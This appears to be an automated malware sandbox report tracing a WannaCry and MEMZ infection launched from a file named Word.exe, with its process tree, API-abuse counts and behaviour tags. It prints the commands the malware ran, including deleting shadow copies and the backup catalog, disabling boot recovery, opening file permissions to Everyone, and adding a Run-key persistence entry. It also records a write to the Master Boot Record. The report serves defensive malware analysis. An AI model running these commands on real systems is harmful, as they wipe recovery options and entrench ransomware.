Taskmgr.exepid process 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe 5392 Taskmgr.exe -
Suspicious use of SetWindowsHookEx 59 IoCs
Processes:
Word.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exeMEMZ.exe@WanaDecryptor@.exewordpad.exe@WanaDecryptor@.exemmc.exemmc.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exewordpad.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exepid process 1192 Word.exe 1192 Word.exe 2088 @WanaDecryptor@.exe 2088 @WanaDecryptor@.exe 2500 @WanaDecryptor@.exe 2500 @WanaDecryptor@.exe 1284 @WanaDecryptor@.exe 1284 @WanaDecryptor@.exe 4332 @WanaDecryptor@.exe 2532 @WanaDecryptor@.exe 5012 @WanaDecryptor@.exe 4256 @WanaDecryptor@.exe 4904 @WanaDecryptor@.exe 4828 MEMZ.exe 6052 @WanaDecryptor@.exe 2948 wordpad.exe 2948 wordpad.exe 2948 wordpad.exe 2948 wordpad.exe 2948 wordpad.exe 4828 MEMZ.exe 1468 @WanaDecryptor@.exe 772 mmc.exe 1916 mmc.exe 1916 mmc.exe 4828 MEMZ.exe 5612 @WanaDecryptor@.exe 5612 @WanaDecryptor@.exe 4828 MEMZ.exe 2852 @WanaDecryptor@.exe 4828 MEMZ.exe 4792 @WanaDecryptor@.exe 4416 wordpad.exe 4416 wordpad.exe 4416 wordpad.exe 4416 wordpad.exe 4416 wordpad.exe 4828 MEMZ.exe 4972 @WanaDecryptor@.exe 4828 MEMZ.exe 4828 MEMZ.exe 4944 @WanaDecryptor@.exe 4828 MEMZ.exe 3880 @WanaDecryptor@.exe 4828 MEMZ.exe 4828 MEMZ.exe 5328 @WanaDecryptor@.exe 4828 MEMZ.exe 4828 MEMZ.exe 320 @WanaDecryptor@.exe 4828 MEMZ.exe 4828 MEMZ.exe 7084 @WanaDecryptor@.exe 4828 MEMZ.exe 4828 MEMZ.exe 4828 MEMZ.exe 7144 @WanaDecryptor@.exe 4828 MEMZ.exe 4828 MEMZ.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Word.exeed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.execmd.exeMEMZ.exeMEMZ.execmd.exe@WanaDecryptor@.exedescription pid process target process PID 1192 wrote to memory of 1572 1192 Word.exe ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe PID 1192 wrote to memory of 1572 1192 Word.exe ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe PID 1192 wrote to memory of 1572 1192 Word.exe ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe PID 1572 wrote to memory of 4284 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe attrib.exe PID 1572 wrote to memory of 4284 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe attrib.exe PID 1572 wrote to memory of 4284 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe attrib.exe PID 1572 wrote to memory of 1172 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe icacls.exe PID 1572 wrote to memory of 1172 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe icacls.exe PID 1572 wrote to memory of 1172 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe icacls.exe PID 1572 wrote to memory of 1464 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe taskdl.exe PID 1572 wrote to memory of 1464 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe taskdl.exe PID 1572 wrote to memory of 1464 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe taskdl.exe PID 1572 wrote to memory of 3284 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe cmd.exe PID 1572 wrote to memory of 3284 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe cmd.exe PID 1572 wrote to memory of 3284 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe cmd.exe PID 3284 wrote to memory of 3736 3284 cmd.exe cscript.exe PID 3284 wrote to memory of 3736 3284 cmd.exe cscript.exe PID 3284 wrote to memory of 3736 3284 cmd.exe cscript.exe PID 1192 wrote to memory of 4236 1192 Word.exe MEMZ.exe PID 1192 wrote to memory of 4236 1192 Word.exe MEMZ.exe PID 1192 wrote to memory of 4236 1192 Word.exe MEMZ.exe PID 4236 wrote to memory of 1336 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 1336 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 1336 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 1844 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 1844 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 1844 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 4108 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 4108 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 4108 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 3696 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 3696 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 3696 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 812 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 812 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 812 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 4828 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 4828 4236 MEMZ.exe MEMZ.exe PID 4236 wrote to memory of 4828 4236 MEMZ.exe MEMZ.exe PID 4828 wrote to memory of 1524 4828 MEMZ.exe notepad.exe PID 4828 wrote to memory of 1524 4828 MEMZ.exe notepad.exe PID 4828 wrote to memory of 1524 4828 MEMZ.exe notepad.exe PID 1572 wrote to memory of 2088 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe @WanaDecryptor@.exe PID 1572 wrote to memory of 2088 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe @WanaDecryptor@.exe PID 1572 wrote to memory of 2088 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe @WanaDecryptor@.exe PID 1572 wrote to memory of 4084 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe cmd.exe PID 1572 wrote to memory of 4084 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe cmd.exe PID 1572 wrote to memory of 4084 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe cmd.exe PID 4084 wrote to memory of 2500 4084 cmd.exe @WanaDecryptor@.exe PID 4084 wrote to memory of 2500 4084 cmd.exe @WanaDecryptor@.exe PID 4084 wrote to memory of 2500 4084 cmd.exe @WanaDecryptor@.exe PID 2088 wrote to memory of 4736 2088 @WanaDecryptor@.exe taskhsvc.exe PID 2088 wrote to memory of 4736 2088 @WanaDecryptor@.exe taskhsvc.exe PID 2088 wrote to memory of 4736 2088 @WanaDecryptor@.exe taskhsvc.exe PID 1572 wrote to memory of 3348 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe taskdl.exe PID 1572 wrote to memory of 3348 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe taskdl.exe PID 1572 wrote to memory of 3348 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe taskdl.exe PID 1572 wrote to memory of 4544 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe taskse.exe PID 1572 wrote to memory of 4544 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe taskse.exe PID 1572 wrote to memory of 4544 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe taskse.exe PID 1572 wrote to memory of 1284 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe @WanaDecryptor@.exe PID 1572 wrote to memory of 1284 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe @WanaDecryptor@.exe PID 1572 wrote to memory of 1284 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe @WanaDecryptor@.exe PID 1572 wrote to memory of 4348 1572 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe cmd.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Word.exe"C:\Users\Admin\AppData\Local\Temp\Word.exe"1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"2⤵
- Modifies extensions of user files
- Drops startup file
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +h .3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 311251678944450.bat3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs4⤵
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe co3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /b @WanaDecryptor@.exe vs3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe vs4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qpzmehtw499" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qpzmehtw499" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f4⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47184⤵
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe@WanaDecryptor@.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /watchdog3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe"C:\Users\Admin\AppData\Local\Temp\MEMZ.exe" /main3⤵
- Checks computer location settings
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" \note.txt4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+create+your+own+ransomware4⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f47185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:15⤵
-
